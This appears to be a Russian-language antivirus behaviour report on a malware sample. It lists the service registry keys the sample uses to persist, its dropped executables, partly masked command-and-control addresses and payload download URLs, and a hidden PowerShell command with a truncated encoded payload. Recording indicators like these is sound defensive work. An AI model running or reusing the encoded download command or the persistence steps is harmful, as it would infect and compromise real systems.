Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\ieakui] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\ieakui] 'ImagePath' = '"%WINDIR%\SysWOW64\QUTIL\ieakui.exe"'
- 'ieakui' "%WINDIR%\SysWOW64\QUTIL\ieakui.exe"
- 'ieakui' %WINDIR%\SysWOW64\QUTIL\ieakui.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAcQBQAFoATgBDAD0AIAAgAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADUAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADEAfQAiACAALQBGACcAcwAnACwAJwB5ACcALAAnAC4AaQBPACcALAAnAHQATwBSACcALAAnAC4AZA...
- %HOMEPATH%\zywxi7n\mn7d8nm\rieb3cpl.exe
- %WINDIR%\syswow64\qutil\ieakui.exe
- %HOMEPATH%\zywxi7n\mn7d8nm\rieb3cpl.exe в %WINDIR%\syswow64\qutil\ieakui.exe
- '81.##4.253.80':443
- '94.##.62.116':8080
- http://in######cquanaogiare.com/wp-includes/Jh1/
- http://www.ed####othingmcr.com/indexing/c9/
- http://94.##.62.116:8080/9fa8zmkJIYkI/ via 94.##.62.116
- DNS ASK in######cquanaogiare.com
- DNS ASK ed####othingmcr.com
- '%HOMEPATH%\zywxi7n\mn7d8nm\rieb3cpl.exe'
- '%WINDIR%\syswow64\qutil\ieakui.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgACQAcQBQAFoATgBDAD0AIAAgAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADUAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADEAfQAiACAALQBGACcAcwAnACwAJwB5ACcALAAnAC4AaQBPACcALAAnAHQATwBSACcALAAnAC4AZA...' (со скрытым окном)